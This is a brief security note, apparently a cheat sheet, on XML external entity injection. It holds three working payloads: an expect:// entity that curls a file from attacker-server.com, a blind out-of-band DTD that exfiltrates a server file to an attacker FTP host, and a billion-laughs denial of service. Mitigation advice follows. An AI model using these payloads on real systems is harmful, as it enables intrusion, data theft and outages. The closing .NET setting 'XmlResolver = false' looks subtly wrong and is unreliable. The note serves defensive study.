XXEi

Exploitation vectors:

  1. RCE through the 'expect://' wrapper on a PHP server with an Expect extension. Given the constraints caused by the prohibition of spaces and the parser's refusal to decode encoded symbols, to construct a URI it's possible to utilize the system variable $IFS as the delimiter.
<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE root [  
    <!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'attacker-server.com:8000/xxe.php'">  
]>
<root>  
<name>Joe</name>
<email>START_&file;_END</email>
</root>
  1. File extraction via SSRF through OOB XXEi in blind context
<?xml version="1.0" ?>
<!DOCTYPE aaa [
    <!ENTITY % bbb SYSTEM "http://attacker-server.com:8090/xxe.dtd">
    %bbb;
    %ccc;
]>
<a>&eee;</a>

<!-- xxe.dtd -->
<!ENTITY % ddd SYSTEM "file:///var/www/web.xml"> 
<!ENTITY % ccc "<!ENTITY eee SYSTEM 'ftp://ATTACKERSERVER:2121/%ddd;'>">
  1. Classic billion laughs DoS.
<?xml version="1.0"?>
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<lolz>&lol6;</lolz>

Mitigation measures include:

  1. disable XInclude
  2. disable XXE.
  3. disable DTD or the recourse to XSD as a viable alternative.
  4. In the event that an application interfaces with JSON, one must take care to ensure that endpoints do not process XML.
  5. Additionally, it may make sense to restrict the schemas employed and the transmission of data in the response issued to the client.

For guidance on migration refer to the following resource: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html. For example, in .NET 8 XmlReader objects by default are initialized with an XmlReaderSettings.DtdProcessing = Prohibit and XmlReaderSettings.XmlResolver = false.